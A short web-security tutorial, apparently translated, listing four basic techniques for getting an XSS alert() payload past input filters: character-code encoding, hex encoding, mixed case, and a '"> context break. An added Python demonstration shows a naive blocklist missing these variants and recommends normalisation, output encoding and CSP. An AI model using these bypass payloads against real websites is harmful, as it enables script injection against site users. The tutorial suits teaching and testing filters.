Four very basic bypass methods.

1. Convert to ASCII codes
Example: the original script is <script>alert('I love F4ck')</script>
After conversion it becomes:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 39, 41)</script>

2. Convert to HEX (hexadecimal)
Example: the original script is <script>alert('I love F4ck')</script>
After conversion it becomes:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%49%20%6c%6f%76%65%20%46%34%63%6b%27%29%3c%2f%73%63%72%69%70%74%3e

3. Change the case of the script
Example: the original script is <script>alert('I love F4ck')</script>
Converted to: <ScRipt>AleRt('I love F4ck')</sCRipT>

4. Add the closing marker ">
Example: the original script is <script>alert('I love F4ck')</script>
Converted to: "><script>alert('I love F4ck')</script>

For more detailed bypass techniques, see this page:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
The conversion tool used is the Firefox HackBar Mozilla add-on.
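The four transformations above all defeat a filter that matches the raw input literally. The following added example (written for this post; it is not from the original author or from HackBar) shows, from the filter's side, why that happens: it runs the four sample payloads through a naive token blocklist and then through the same blocklist after normalisation (percent-decoding, expanding String.fromCharCode(...), case-folding). The payload strings are constructed copies of the examples above; the token list and function names are assumptions for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed sample inputs: the four variants described in the post.
SAMPLES = {
    "ascii": "<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 39, 73, 32, "
             "108, 111, 118, 101, 32, 70, 52, 99, 107, 39, 41)</script>",
    "hex": "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%49%20%6c%6f%76%65"
           "%20%46%34%63%6b%27%29%3c%2f%73%63%72%69%70%74%3e",
    "case": "<ScRipt>AleRt('I love F4ck')</sCRipT>",
    "close_tag": "\"><script>alert('I love F4ck')</script>",
}

# Assumed blocklist of a naive, literal-match filter.
BLOCKLIST = ("<script", "alert(")

_FROM_CHAR_CODE = re.compile(r"String\.fromCharCode\s*\(([^)]*)\)")


def _expand_from_char_code(match: re.Match) -> str:
    # Turn "String.fromCharCode(97, 108, ...)" into the characters it builds.
    codes = re.findall(r"\d+", match.group(1))
    return "".join(chr(int(c)) for c in codes)


def normalize(s: str) -> str:
    """Canonicalise input the way a browser/server effectively sees it:
    percent-decode until stable, expand fromCharCode, and case-fold
    (HTML tag names are case-insensitive)."""
    prev = None
    while prev != s:          # handles double-encoding such as %2527
        prev = s
        s = unquote(s)
    s = _FROM_CHAR_CODE.sub(_expand_from_char_code, s)
    return s.lower()


def matched_tokens(s: str, normalize_first: bool = False) -> set:
    """Return the blocklist tokens found in s, optionally after normalisation."""
    haystack = normalize(s) if normalize_first else s
    return {tok for tok in BLOCKLIST if tok in haystack}


if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name:10} raw={sorted(matched_tokens(payload))} "
              f"normalized={sorted(matched_tokens(payload, True))}")
```

Running it shows that the hex and case variants produce no matches at all against the raw blocklist, the fromCharCode variant hides only the alert( token, and the ">-prefixed variant is not hidden by any encoding: it is a context break (closing an attribute or tag the input was injected into), which no amount of input normalisation addresses. Normalising before matching closes the first three gaps, but a blocklist remains a weak control; the robust mitigation is context-aware output encoding of untrusted data plus a Content Security Policy, with input filtering as defence in depth only.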